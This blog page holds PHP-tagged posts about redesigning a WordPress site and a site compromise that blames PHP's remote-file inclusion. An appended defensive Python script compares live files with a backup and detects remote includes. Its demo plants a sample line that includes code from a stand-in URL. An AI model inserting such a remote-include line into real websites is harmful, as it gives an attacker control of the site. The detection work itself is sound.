Arrg kxrrt!

Blog : Posts tagged with 'PHP'


Design points

In which nothing, design-wise, is accomplished


As I mentioned recently, I’m embarking on a Grand Epic Ground-Upwards Redesign of this site, because, well, the design hasn’t been changed since I first set it up. I knocked it together in a few days holiday in August ’05; back then my holiday year ended in August and I often had a few spare days at the end of the month where I had nothing to do and needed to keep myself occupied. In 2005, this blog was the result.

Anyway, my point is: it was put together in a bit of a hurry, with most of the design code ripped out of a standard theme I downloaded, without me really understanding what each bit did. The design’s always had a few rough edges, and there are lots of things that I’ve meant to develop further but never have. Hopefully, some of those points will be addressed, attacked, and taken by storm.

Thinking about the design, though, and what I want it to achieve, has made me think about one of the things I was most unhappy with when I first put this site together. One of the things I liked about this theme when I first saw it was:* the little boxes for the date on each post. You know, these ones:

Date with cardinal number

But one thing I didn’t like, though, was the cardinal number. Maybe it’s because I’m English, that that’s how I was taught, but when I read a date, I always read it with an ordinal number. “January 11th”, not “January 11”.

I can’t remember, to be honest, if it was possible to fix that easily when I first started using WordPress. Possibly it was, possibly it was something that’s been added later.** In any case, I didn’t fix it. I know I tried to, at one point; but abandoned the fix and didn’t go back to it. Then I forgot the issue, until, coming back to the redesign, I tried the fix again the other day. When I retried it, I remembered that I’d given it a go before. Because this is the result:

Date with ordinal number

Those two extra characters mean that on most days, the text is just marginally too long to fit in the box. The box gets pushed down. Which isn’t so bad; but, it doesn’t always happen. You can’t necessarily know what the date box will look like; how it will relate to the elements around it. Moreover, I don’t know how it will look on other computers, where the fonts have slightly differing metrics to mine.

There are ways to fix it, of course. The box could be slightly wider. I could make sure that the horizontal line always comes underneath the date box, although that might leave annoying white space under the post title. The question, though, is whether it’s worth doing. However many times I tweak it, I’m not sure I’d ever get it quite right based on the current design.

And so, this all is partly why I’m going to start pretty much from scratch. The risk is that I’ll reinvent the wheel; the upside is that at least I’ll know how it works from its heart.

* and still is

** To be pedantic: it’s not a feature of WordPress itself, it’s a feature of PHP, the underlying language. I’m too lazy to go back through PHP’s version change logs and find out when the feature in question – the “S” character in date formatting strings – was added.


Defence In Depth

In which we discover we’ve been bad, and have a rant about why


A couple of weeks ago, I discovered that my site had, apparently, been compromised, but my hosting company had handled it. WordPress had been broken in the process; but I’m not entirely surprised. Nevertheless, I thought everything was now happy.

This morning, though, a letter from Google lets me know: it hadn’t been fixed. My site has, for the past fortnight, been serving up crap to any passing search engine. This can’t be good. I don’t blame my hosting company: what they did do was above and beyond the call of duty, and they can’t be expected to understand and trace every twisty little maze of code paths in WordPress that might result in something being sent back to the client’s screen.*** What it does make me want to rant about, though, is PHP.

PHP is – if you’re not a geek and haven’t heard about it – by far the most common “web-programming” language around today. Its modus operandi is: you intersperse chunks of programming code in and around the static content in your web pages. When your webserver reads a page, it will run the chunks of code as a program. In WordPress’s case, the chunks of code run off to a database and fetch my posts, your comments, and so on, from it, and send them back to a client. Thus, one web page can output many posts, managing them is much easier, and so on. All well and good.

PHP, though, is … well. It’s not exactly the best language for the job, which is being polite about it. I’ve been doing lots of programming in it myself lately, for our Office Intranet, and it’s just not as rigorous as other languages. The syntax doesn’t somehow seem as thorough. Apart from the little differences you always get between languages,* it has little corners that feel slightly wrong when I use them, as if I’m transgressing the boundaries between types of programming object in a bad and dirty way.

That’s just a minor thing, really, just me quibbling. What my big problem is, what makes PHP an utterly unsuitable programming language for its job, is one particular feature much adored by people who want to take control of your website and use it to advertise pr0n and drugs. It’s a feature which is unutterably stupid, so stupid I can’t believe anyone thought it should have been created. PHP will, if you like, go and read a file from anywhere on the internet, and run it for you. Which means that a shifty-looking programmer who gets illicit access to the files on your website only has to add a couple of lines of code, to get complete control of everything. Bang. Like that.

Now, you could say: well, FP, you shouldn’t have been using FTP. And you’re right.** My hosts offer SFTP instead, and I should have been using that. There’s no good reason to use FTP either if you have an alternative available. But that doesn’t mean that the next hole along the line shouldn’t be blocked either. It’s called: defence in depth. At work, we have a high fence round the whole site, and an alarm system just inside it; but that doesn’t mean that we leave the office buildings unlocked. Security shouldn’t be brittle; ideally it shouldn’t be thin either. Once you’ve breached the first layer, the tools to complete the job shouldn’t be left lying around.

* The difference between ‘elseif’ – which is a PHP keyword – and ‘elsif’, Perl’s spelling of the same thing – will forever damage my brain.

** I have a good story about how weak FTP can be – but it can wait for another time.

*** and, indeed, it’s my own fault; I should right away have compared the live files with my known-good backups.
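
The check described in the last footnote, comparing the live files with a known-good backup, can be combined with a scan for the remote-include feature the post complains about. This is an added example, not code from the original post; the function names, directory layout and sample files are constructed for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# include/require (and the _once forms) whose argument starts with a remote URL.
REMOTE_INCLUDE = re.compile(
    r"""\b(?:include|require)(?:_once)?\s*\(?\s*['"](?:https?|ftp)://""", re.IGNORECASE)

def tree_hashes(root):
    """Map each file path (relative to root) to its SHA-256 digest."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}

def compare_with_backup(live_root, backup_root):
    """Report files that differ from the backup, and which of them pull in remote code."""
    live, good = tree_hashes(live_root), tree_hashes(backup_root)
    added = sorted(set(live) - set(good))
    missing = sorted(set(good) - set(live))
    modified = sorted(f for f in set(live) & set(good) if live[f] != good[f])
    # Only files that changed since the backup need a content scan.
    remote = sorted(f for f in added + modified
                    if REMOTE_INCLUDE.search((Path(live_root) / f).read_text(errors="replace")))
    return {"added": added, "modified": modified, "missing": missing,
            "remote_include": remote}

def demo():
    """Build two small constructed trees (backup and tampered live copy) and compare them."""
    with tempfile.TemporaryDirectory() as tmp:
        backup, live = Path(tmp, "backup"), Path(tmp, "live")
        for root in (backup, live):
            root.mkdir()
            (root / "index.php").write_text("<?php require('wp-blog-header.php');\n")
            (root / "footer.php").write_text("<?php echo 'bye';\n")
        # Constructed tampering: one appended remote include, one unexpected new file.
        (live / "footer.php").write_text(
            "<?php echo 'bye';\ninclude('http://example.invalid/x.txt');\n")
        (live / "cache.php").write_text("<?php // unexpected file\n")
        return compare_with_backup(live, backup)

if __name__ == "__main__":
    print(demo())
```

As a further layer, PHP's `allow_url_include` setting in php.ini controls whether `include` and `require` accept URLs at all; keeping it off removes the tool even if a file is altered.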
